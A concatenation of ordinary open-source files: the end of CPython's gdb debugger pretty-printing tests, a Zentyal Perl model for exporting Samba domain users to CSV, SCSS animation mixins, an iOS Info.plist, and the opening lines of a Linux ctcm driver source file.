# in its output, depending on the width of the terminal it's connected
# to (using its "wrap_here" function)
m = re.match('.*#0\s+builtin_id\s+\(self\=.*,\s+v=\s*(.*?)\)\s+at\s+\S*Python/bltinmodule.c.*',
gdb_output, re.DOTALL)
if not m:
self.fail('Unexpected gdb output: %r\n%s' % (gdb_output, gdb_output))
return m.group(1), gdb_output
def assertEndsWith(self, actual, exp_end):
'''Ensure that the given "actual" string ends with "exp_end"'''
self.assertTrue(actual.endswith(exp_end),
msg='%r did not end with %r' % (actual, exp_end))
def assertMultilineMatches(self, actual, pattern):
m = re.match(pattern, actual, re.DOTALL)
if not m:
self.fail(msg='%r did not match %r' % (actual, pattern))
def get_sample_script(self):
return findfile('gdb_sample.py')
class PrettyPrintTests(DebuggerTests):
def test_getting_backtrace(self):
gdb_output = self.get_stack_trace('id(42)')
self.assertTrue(BREAKPOINT_FN in gdb_output)
def assertGdbRepr(self, val, exp_repr=None):
# Ensure that gdb's rendering of the value in a debugged process
# matches repr(value) in this process:
gdb_repr, gdb_output = self.get_gdb_repr('id(' + ascii(val) + ')')
if not exp_repr:
exp_repr = repr(val)
self.assertEqual(gdb_repr, exp_repr,
('%r did not equal expected %r; full output was:\n%s'
% (gdb_repr, exp_repr, gdb_output)))
def test_int(self):
'Verify the pretty-printing of various int values'
self.assertGdbRepr(42)
self.assertGdbRepr(0)
self.assertGdbRepr(-7)
self.assertGdbRepr(1000000000000)
self.assertGdbRepr(-1000000000000000)
def test_singletons(self):
'Verify the pretty-printing of True, False and None'
self.assertGdbRepr(True)
self.assertGdbRepr(False)
self.assertGdbRepr(None)
def test_dicts(self):
'Verify the pretty-printing of dictionaries'
self.assertGdbRepr({})
self.assertGdbRepr({'foo': 'bar'}, "{'foo': 'bar'}")
self.assertGdbRepr({'foo': 'bar', 'douglas': 42}, "{'douglas': 42, 'foo': 'bar'}")
def test_lists(self):
'Verify the pretty-printing of lists'
self.assertGdbRepr([])
self.assertGdbRepr(list(range(5)))
def test_bytes(self):
'Verify the pretty-printing of bytes'
self.assertGdbRepr(b'')
self.assertGdbRepr(b'And now for something hopefully the same')
self.assertGdbRepr(b'string with embedded NUL here \0 and then some more text')
self.assertGdbRepr(b'this is a tab:\t'
b' this is a slash-N:\n'
b' this is a slash-R:\r'
)
self.assertGdbRepr(b'this is byte 255:\xff and byte 128:\x80')
self.assertGdbRepr(bytes([b for b in range(255)]))
def test_strings(self):
'Verify the pretty-printing of unicode strings'
encoding = locale.getpreferredencoding()
def check_repr(text):
try:
text.encode(encoding)
printable = True
except UnicodeEncodeError:
self.assertGdbRepr(text, ascii(text))
else:
self.assertGdbRepr(text)
self.assertGdbRepr('')
self.assertGdbRepr('And now for something hopefully the same')
self.assertGdbRepr('string with embedded NUL here \0 and then some more text')
# Test printing a single character:
# U+2620 SKULL AND CROSSBONES
check_repr('\u2620')
# Test printing a Japanese unicode string
# (I believe this reads "mojibake", using 3 characters from the CJK
# Unified Ideographs area, followed by U+3051 HIRAGANA LETTER KE)
check_repr('\u6587\u5b57\u5316\u3051')
# Test a character outside the BMP:
# U+1D121 MUSICAL SYMBOL C CLEF
# This is:
# UTF-8: 0xF0 0x9D 0x84 0xA1
# UTF-16: 0xD834 0xDD21
check_repr(chr(0x1D121))
def test_tuples(self):
'Verify the pretty-printing of tuples'
self.assertGdbRepr(tuple(), '()')
self.assertGdbRepr((1,), '(1,)')
self.assertGdbRepr(('foo', 'bar', 'baz'))
def test_sets(self):
'Verify the pretty-printing of sets'
if (gdb_major_version, gdb_minor_version) < (7, 3):
self.skipTest("pretty-printing of sets needs gdb 7.3 or later")
self.assertGdbRepr(set(), 'set()')
self.assertGdbRepr(set(['a', 'b']), "{'a', 'b'}")
self.assertGdbRepr(set([4, 5, 6]), "{4, 5, 6}")
# Ensure that we handle sets containing the "dummy" key value,
# which happens on deletion:
gdb_repr, gdb_output = self.get_gdb_repr('''s = set(['a','b'])
s.remove('a')
id(s)''')
self.assertEqual(gdb_repr, "{'b'}")
def test_frozensets(self):
'Verify the pretty-printing of frozensets'
if (gdb_major_version, gdb_minor_version) < (7, 3):
self.skipTest("pretty-printing of frozensets needs gdb 7.3 or later")
self.assertGdbRepr(frozenset(), 'frozenset()')
self.assertGdbRepr(frozenset(['a', 'b']), "frozenset({'a', 'b'})")
self.assertGdbRepr(frozenset([4, 5, 6]), "frozenset({4, 5, 6})")
def test_exceptions(self):
# Test a RuntimeError
gdb_repr, gdb_output = self.get_gdb_repr('''
try:
raise RuntimeError("I am an error")
except RuntimeError as e:
id(e)
''')
self.assertEqual(gdb_repr,
"RuntimeError('I am an error',)")
# Test division by zero:
gdb_repr, gdb_output = self.get_gdb_repr('''
try:
a = 1 / 0
except ZeroDivisionError as e:
id(e)
''')
self.assertEqual(gdb_repr,
"ZeroDivisionError('division by zero',)")
def test_modern_class(self):
'Verify the pretty-printing of new-style class instances'
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo:
pass
foo = Foo()
foo.an_int = 42
id(foo)''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def test_subclassing_list(self):
'Verify the pretty-printing of an instance of a list subclass'
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(list):
pass
foo = Foo()
foo += [1, 2, 3]
foo.an_int = 42
id(foo)''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def test_subclassing_tuple(self):
'Verify the pretty-printing of an instance of a tuple subclass'
# This should exercise the negative tp_dictoffset code in the
# new-style class support
gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(tuple):
pass
foo = Foo((1, 2, 3))
foo.an_int = 42
id(foo)''')
m = re.match(r'<Foo\(an_int=42\) at remote 0x-?[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected new-style class rendering %r' % gdb_repr)
def assertSane(self, source, corruption, exprepr=None):
'''Run Python under gdb, corrupting variables in the inferior process
immediately before taking a backtrace.
Verify that the variable's representation is the expected failsafe
representation'''
if corruption:
cmds_after_breakpoint=[corruption, 'backtrace']
else:
cmds_after_breakpoint=['backtrace']
gdb_repr, gdb_output = \
self.get_gdb_repr(source,
cmds_after_breakpoint=cmds_after_breakpoint)
if exprepr:
if gdb_repr == exprepr:
# gdb managed to print the value in spite of the corruption;
# this is good (see http://bugs.python.org/issue8330)
return
# Match anything for the type name; 0xDEADBEEF could point to
# something arbitrary (see http://bugs.python.org/issue8330)
pattern = '<.* at remote 0x-?[0-9a-f]+>'
m = re.match(pattern, gdb_repr)
if not m:
self.fail('Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_NULL_ptr(self):
'Ensure that a NULL PyObject* is handled gracefully'
gdb_repr, gdb_output = (
self.get_gdb_repr('id(42)',
cmds_after_breakpoint=['set variable v=0',
'backtrace'])
)
self.assertEqual(gdb_repr, '0x0')
def test_NULL_ob_type(self):
'Ensure that a PyObject* with NULL ob_type is handled gracefully'
self.assertSane('id(42)',
'set v->ob_type=0')
def test_corrupt_ob_type(self):
'Ensure that a PyObject* with a corrupt ob_type is handled gracefully'
self.assertSane('id(42)',
'set v->ob_type=0xDEADBEEF',
exprepr='42')
def test_corrupt_tp_flags(self):
'Ensure that a PyObject* with a type with corrupt tp_flags is handled'
self.assertSane('id(42)',
'set v->ob_type->tp_flags=0x0',
exprepr='42')
def test_corrupt_tp_name(self):
'Ensure that a PyObject* with a type with corrupt tp_name is handled'
self.assertSane('id(42)',
'set v->ob_type->tp_name=0xDEADBEEF',
exprepr='42')
def test_builtins_help(self):
'Ensure that the new-style class _Helper in site.py can be handled'
# (this was the issue causing tracebacks in
# http://bugs.python.org/issue8032#msg100537 )
gdb_repr, gdb_output = self.get_gdb_repr('id(__builtins__.help)', import_site=True)
m = re.match(r'<_Helper at remote 0x-?[0-9a-f]+>', gdb_repr)
self.assertTrue(m,
msg='Unexpected rendering %r' % gdb_repr)
def test_selfreferential_list(self):
'''Ensure that a reference loop involving a list doesn't lead proxyval
into an infinite loop:'''
gdb_repr, gdb_output = \
self.get_gdb_repr("a = [3, 4, 5] ; a.append(a) ; id(a)")
self.assertEqual(gdb_repr, '[3, 4, 5, [...]]')
gdb_repr, gdb_output = \
self.get_gdb_repr("a = [3, 4, 5] ; b = [a] ; a.append(b) ; id(a)")
self.assertEqual(gdb_repr, '[3, 4, 5, [[...]]]')
def test_selfreferential_dict(self):
'''Ensure that a reference loop involving a dict doesn't lead proxyval
into an infinite loop:'''
gdb_repr, gdb_output = \
self.get_gdb_repr("a = {} ; b = {'bar':a} ; a['foo'] = b ; id(a)")
self.assertEqual(gdb_repr, "{'foo': {'bar': {...}}}")
def test_selfreferential_old_style_instance(self):
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo:
pass
foo = Foo()
foo.an_attr = foo
id(foo)''')
self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_selfreferential_new_style_instance(self):
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo(object):
pass
foo = Foo()
foo.an_attr = foo
id(foo)''')
self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
gdb_repr, gdb_output = \
self.get_gdb_repr('''
class Foo(object):
pass
a = Foo()
b = Foo()
a.an_attr = b
b.an_attr = a
id(a)''')
self.assertTrue(re.match('<Foo\(an_attr=<Foo\(an_attr=<\.\.\.>\) at remote 0x-?[0-9a-f]+>\) at remote 0x-?[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_truncation(self):
'Verify that very long output is truncated'
gdb_repr, gdb_output = self.get_gdb_repr('id(list(range(1000)))')
self.assertEqual(gdb_repr,
"[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, "
"14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, "
"27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, "
"40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, "
"53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, "
"66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, "
"79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, "
"92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, "
"104, 105, 106, 107, 108, 109, 110, 111, 112, 113, "
"114, 115, 116, 117, 118, 119, 120, 121, 122, 123, "
"124, 125, 126, 127, 128, 129, 130, 131, 132, 133, "
"134, 135, 136, 137, 138, 139, 140, 141, 142, 143, "
"144, 145, 146, 147, 148, 149, 150, 151, 152, 153, "
"154, 155, 156, 157, 158, 159, 160, 161, 162, 163, "
"164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
"174, 175, 176, 177, 178, 179, 180, 181, 182, 183, "
"184, 185, 186, 187, 188, 189, 190, 191, 192, 193, "
"194, 195, 196, 197, 198, 199, 200, 201, 202, 203, "
"204, 205, 206, 207, 208, 209, 210, 211, 212, 213, "
"214, 215, 216, 217, 218, 219, 220, 221, 222, 223, "
"224, 225, 226...(truncated)")
self.assertEqual(len(gdb_repr),
1024 + len('...(truncated)'))
def test_builtin_method(self):
gdb_repr, gdb_output = self.get_gdb_repr('import sys; id(sys.stdout.readlines)')
self.assertTrue(re.match('<built-in method readlines of _io.TextIOWrapper object at remote 0x-?[0-9a-f]+>',
gdb_repr),
'Unexpected gdb representation: %r\n%s' % \
(gdb_repr, gdb_output))
def test_frames(self):
gdb_output = self.get_stack_trace('''
def foo(a, b, c):
pass
foo(3, 4, 5)
id(foo.__code__)''',
breakpoint='builtin_id',
cmds_after_breakpoint=['print (PyFrameObject*)(((PyCodeObject*)v)->co_zombieframe)']
)
self.assertTrue(re.match('.*\s+\$1 =\s+Frame 0x-?[0-9a-f]+, for file <string>, line 3, in foo \(\)\s+.*',
gdb_output,
re.DOTALL),
'Unexpected gdb representation: %r\n%s' % (gdb_output, gdb_output))
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
class PyListTests(DebuggerTests):
def assertListing(self, expected, actual):
self.assertEndsWith(actual, expected)
def test_basic_command(self):
'Verify that the "py-list" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list'])
self.assertListing(' 5 \n'
' 6 def bar(a, b, c):\n'
' 7 baz(a, b, c)\n'
' 8 \n'
' 9 def baz(*args):\n'
' >10 id(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_one_abs_arg(self):
'Verify the "py-list" command with one absolute argument'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 9'])
self.assertListing(' 9 def baz(*args):\n'
' >10 id(42)\n'
' 11 \n'
' 12 foo(1, 2, 3)\n',
bt)
def test_two_abs_args(self):
'Verify the "py-list" command with two absolute arguments'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-list 1,3'])
self.assertListing(' 1 # Sample script for use by test_gdb.py\n'
' 2 \n'
' 3 def foo(a, b, c):\n',
bt)
class StackNavigationTests(DebuggerTests):
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_pyup_command(self):
'Verify that the "py-up" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
$''')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_down_at_bottom(self):
'Verify handling of "py-down" at the bottom of the stack'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-down'])
self.assertEndsWith(bt,
'Unable to find a newer python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_up_at_top(self):
'Verify handling of "py-up" at the top of the stack'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up'] * 4)
self.assertEndsWith(bt,
'Unable to find an older python frame\n')
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_up_then_down(self):
'Verify "py-up" followed by "py-down"'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-down'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 10, in baz \(args=\(1, 2, 3\)\)
id\(42\)
$''')
class PyBtTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt(self):
'Verify that the "py-bt" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt'])
self.assertMultilineMatches(bt,
r'''^.*
Traceback \(most recent call first\):
File ".*gdb_sample.py", line 10, in baz
id\(42\)
File ".*gdb_sample.py", line 7, in bar
baz\(a, b, c\)
File ".*gdb_sample.py", line 4, in foo
bar\(a, b, c\)
File ".*gdb_sample.py", line 12, in <module>
foo\(1, 2, 3\)
''')
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_bt_full(self):
'Verify that the "py-bt-full" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-bt-full'])
self.assertMultilineMatches(bt,
r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 4, in foo \(a=1, b=2, c=3\)
bar\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 12, in <module> \(\)
foo\(1, 2, 3\)
''')
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_threads(self):
'Verify that "py-bt" indicates threads that are waiting for the GIL'
cmd = '''
from threading import Thread
class TestThread(Thread):
# These threads would run forever, but we'll interrupt things with the
# debugger
def run(self):
i = 0
while 1:
i += 1
t = {}
for i in range(4):
t[i] = TestThread()
t[i].start()
# Trigger a breakpoint on the main thread
id(42)
'''
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt'])
self.assertIn('Waiting for the GIL', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['thread apply all py-bt-full'])
self.assertIn('Waiting for the GIL', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_gc(self):
'Verify that "py-bt" indicates if a thread is garbage-collecting'
cmd = ('from gc import collect\n'
'id(42)\n'
'def foo():\n'
' collect()\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt'],
)
self.assertIn('Garbage-collecting', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt-full'],
)
self.assertIn('Garbage-collecting', gdb_output)
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
# Some older versions of gdb will fail with
# "Cannot find new threads: generic error"
# unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
@unittest.skipUnless(_thread,
"Python was compiled without thread support")
def test_pycfunction(self):
'Verify that "py-bt" displays invocations of PyCFunction instances'
# Tested function must not be defined with METH_NOARGS or METH_O,
# otherwise call_function() doesn't call PyCFunction_Call()
cmd = ('from time import gmtime\n'
'def foo():\n'
' gmtime(1)\n'
'def bar():\n'
' foo()\n'
'bar()\n')
# Verify with "py-bt":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['bt', 'py-bt'],
)
self.assertIn('<built-in method gmtime', gdb_output)
# Verify with "py-bt-full":
gdb_output = self.get_stack_trace(cmd,
breakpoint='time_gmtime',
cmds_after_breakpoint=['py-bt-full'],
)
self.assertIn('#0 <built-in method gmtime', gdb_output)
class PyPrintTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
'Verify that the "py-print" command works'
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print args'])
self.assertMultilineMatches(bt,
r".*\nlocal 'args' = \(1, 2, 3\)\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
def test_print_after_up(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-print c', 'py-print b', 'py-print a'])
self.assertMultilineMatches(bt,
r".*\nlocal 'c' = 3\nlocal 'b' = 2\nlocal 'a' = 1\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_global(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print __name__'])
self.assertMultilineMatches(bt,
r".*\nglobal '__name__' = '__main__'\n.*")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_printing_builtin(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-print len'])
self.assertMultilineMatches(bt,
r".*\nbuiltin 'len' = <built-in method len of module object at remote 0x-?[0-9a-f]+>\n.*")
class PyLocalsTests(DebuggerTests):
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_basic_command(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-locals'])
self.assertMultilineMatches(bt,
r".*\nargs = \(1, 2, 3\)\n.*")
@unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
@unittest.skipIf(python_is_optimized(),
"Python was compiled with optimizations")
def test_locals_after_up(self):
bt = self.get_stack_trace(script=self.get_sample_script(),
cmds_after_breakpoint=['py-up', 'py-locals'])
self.assertMultilineMatches(bt,
r".*\na = 1\nb = 2\nc = 3\n.*")
def test_main():
if support.verbose:
print("GDB version %s.%s:" % (gdb_major_version, gdb_minor_version))
for line in gdb_version.splitlines():
print(" " * 4 + line)
run_unittest(PrettyPrintTests,
PyListTests,
StackNavigationTests,
PyBtTests,
PyPrintTests,
PyLocalsTests
)
if __name__ == "__main__":
test_main()
|
{
"pile_set_name": "Github"
}
|
# Copyright (C) 2012-2013 Zentyal S.L.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
use strict;
use warnings;
# Class: EEBox::Samba::Model::ExportUsers
#
# This model is used to manage the system status report feature
#
package EBox::Samba::Model::ExportUsers;
use base 'EBox::Model::DataTable';
use EBox::Global;
use EBox::Gettext;
use EBox::Types::Text;
use EBox::Types::Link;
use EBox::Samba::Types::RunExportUsers;
use EBox::Samba::Types::StatusExportUsers;
use EBox::Samba::Types::DownloadExportUsers;
# Constructor: new
#
# Create the new ExportUsers model
#
# Overrides:
#
# <EBox::Model::DataForm::new>
#
# Returns:
#
# <EBox::Samba::Model::ExportUsers> - the recently created model
#
sub new
{
my $class = shift;
my $self = $class->SUPER::new(@_);
bless ( $self, $class );
return $self;
}
# Method: _table
#
# Overrides:
#
# <EBox::Model::DataTable::_table>
#
sub _table
{
my ($self) = @_;
my @tableHeader = (
new EBox::Samba::Types::RunExportUsers(
fieldName => 'exportUsers',
printableName => __('Export users'),
),
new EBox::Samba::Types::StatusExportUsers(
fieldName => 'status',
printableName => __('CSV available'),
),
new EBox::Samba::Types::DownloadExportUsers(
fieldName => 'downloadExportedUsers',
printableName => __('Download csv'),
),
);
my $dataTable =
{
tableName => 'ManageExportUsers',
modelDomain => 'Samba',
printableTableName => __('Export domain users'),
tableDescription => \@tableHeader,
defaultActions => [ 'changeView' ],
};
return $dataTable;
}
# Method: syncRows
#
# Overrides <EBox::Model::DataTable::syncRows>
#
sub syncRows
{
my ($self, $currentRows) = @_;
if (@{$currentRows}) {
return 0;
} else {
$self->add(status => 'noreport');
return 1;
}
}
# Method: precondition
#
# Check if usersandgroups is enabled.
#
# Overrides:
#
# <EBox::Model::DataTable::precondition>
#
sub precondition
{
my ($self) = @_;
my $ed = EBox::Global->communityEdition();
my $dep = $self->parentModule()->isEnabled();
# Return false if this is a community edition
if ($ed) {
return 0;
}
if (! $dep) {
return 0;
}
return 1;
}
# Method: preconditionFailMsg
#
# Returns message to be shown on precondition fail
#
# Overrides:
#
# <EBox::Model::preconditionFailMsg>
#
sub preconditionFailMsg
{
my ($self) = @_;
my $ed = EBox::Global->communityEdition();
my $dep = $self->parentModule()->isEnabled();
if ($ed) {
return __sx("This GUI feature is just available for {oh}Commercial Zentyal Server Edition{ch} if you don't update your Zentyal version, you need to use it from CLI.", oh => '<a href="' . EBox::Config::urlEditions() . '" target="_blank">', ch => '</a>')
}
if (! $dep) {
return __('You must enable the Users and Groups module to access the LDAP information.');
}
}
1;
|
{
"pile_set_name": "Github"
}
|
@mixin fadeIn($duration: 2s) {
-webkit-animation: fadein $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadein $duration; /* Firefox < 16 */
-ms-animation: fadein $duration; /* Internet Explorer */
-o-animation: fadein $duration; /* Opera < 12.1 */
animation: fadein $duration;
}
@mixin fadeInDown($duration: 2s) {
-webkit-animation: fadeInDown $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeInDown $duration; /* Firefox < 16 */
-ms-animation: fadeInDown $duration; /* Internet Explorer */
-o-animation: fadeInDown $duration; /* Opera < 12.1 */
animation: fadeInDown $duration;
}
@mixin moveInLeft($duration: 2s) {
-webkit-animation: moveInLeft $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: moveInLeft $duration; /* Firefox < 16 */
-ms-animation: moveInLeft $duration; /* Internet Explorer */
-o-animation: moveInLeft $duration; /* Opera < 12.1 */
animation: moveInLeft $duration;
}
@mixin moveOutLeft($duration: 2s) {
-webkit-animation: moveOutLeft $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: moveOutLeft $duration; /* Firefox < 16 */
-ms-animation: moveOutLeft $duration; /* Internet Explorer */
-o-animation: moveOutLeft $duration; /* Opera < 12.1 */
animation: moveOutLeft $duration;
}
@mixin fadeInUp($duration: 2s) {
-webkit-animation: fadeInUp $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeInUp $duration; /* Firefox < 16 */
-ms-animation: fadeInUp $duration; /* Internet Explorer */
-o-animation: fadeInUp $duration; /* Opera < 12.1 */
animation: fadeInUp $duration;
}
@mixin fadeOut($duration: 2s) {
-webkit-animation: fadeOut $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeOut $duration; /* Firefox < 16 */
-ms-animation: fadeOut $duration; /* Internet Explorer */
-o-animation: fadeOut $duration; /* Opera < 12.1 */
animation: fadeOut $duration;
}
@mixin fadeOutUp($duration: 2s) {
-webkit-animation: fadeOutUp $duration; /* Safari, Chrome and Opera > 12.1 */
-moz-animation: fadeOutUp $duration; /* Firefox < 16 */
-ms-animation: fadeOutUp $duration; /* Internet Explorer */
-o-animation: fadeOutUp $duration; /* Opera < 12.1 */
animation: fadeOutUp $duration;
}
@mixin shake {
animation-name: shake;
animation-duration: 1s;
animation-fill-mode: both;
}
@mixin fly {
animation-name: fly;
animation-duration: 5s;
}
@keyframes fadein {
from { opacity: 0; }
to { opacity: 1; }
}
@keyframes fadeInDown {
from { opacity: 0; transform: translate3d(0, -100%, 0); }
to { opacity: 1; transform: none; }
}
@keyframes moveInLeft {
from { opacity: 1; transform: translate3d(-100%, 0, 0); }
to { opacity: 1; transform: none; }
}
@keyframes moveOutLeft {
from { opacity: 1; transform: none; }
to { opacity: 1; transform: translate3d(-100%, 0, 0);; }
}
@keyframes fadeInUp {
from { opacity: 0; transform: translate3d(0, 50%, 0); }
to { opacity: 1; transform: none; }
}
@keyframes fadeOut {
from { opacity: 1; }
to { opacity: 0; }
}
@keyframes fadeOutUp {
from { opacity: 1; transform: none; }
to { opacity: 0; transform: translate3d(0, -100%, 0); }
}
@keyframes shake {
from, to {
transform: translate3d(0, 0, 0);
}
10%, 30%, 50%, 70%, 90% {
transform: translate3d(-10px, 0, 0);
}
20%, 40%, 60%, 80% {
transform: translate3d(10px, 0, 0);
}
}
@keyframes fly {
from { left: -100%; }
to { left: 45%; }
}
@mixin translateX($val) {
-webkit-transform: translateX($val);
-moz-transform: translateX($val);
-o-transform: translateX($val);
transform: translateX($val);
}
@keyframes moveRight {
0% { @include translateX(-100%); }
40% { @include translateX(0%); }
60% { @include translateX(0%); }
100% { @include translateX(100%); }
}
|
{
"pile_set_name": "Github"
}
|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>en</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleVersion</key>
<string>1</string>
<key>LSRequiresIPhoneOS</key>
<true/>
<key>UILaunchStoryboardName</key>
<string>LaunchScreen</string>
<key>UIMainStoryboardFile</key>
<string>Main</string>
<key>NSBluetoothPeripheralUsageDescription</key>
<string>蓝牙打印机功能需要您开启蓝牙,并允许该应用使用。</string>
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
<key>UISupportedInterfaceOrientations</key>
<array>
<string>UIInterfaceOrientationPortrait</string>
</array>
</dict>
</plist>
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright IBM Corp. 2007, 2007
* Authors: Peter Tiedemann (ptiedem@de.ibm.com)
*
*/
#undef DEBUG
#undef DEBUGDATA
#undef DEBUGCCW
#define KMSG_COMPONENT "ctcm"
#define pr_fmt(fmt) KMSG_COMPONENT ": " fmt
#include <linux/device.h>
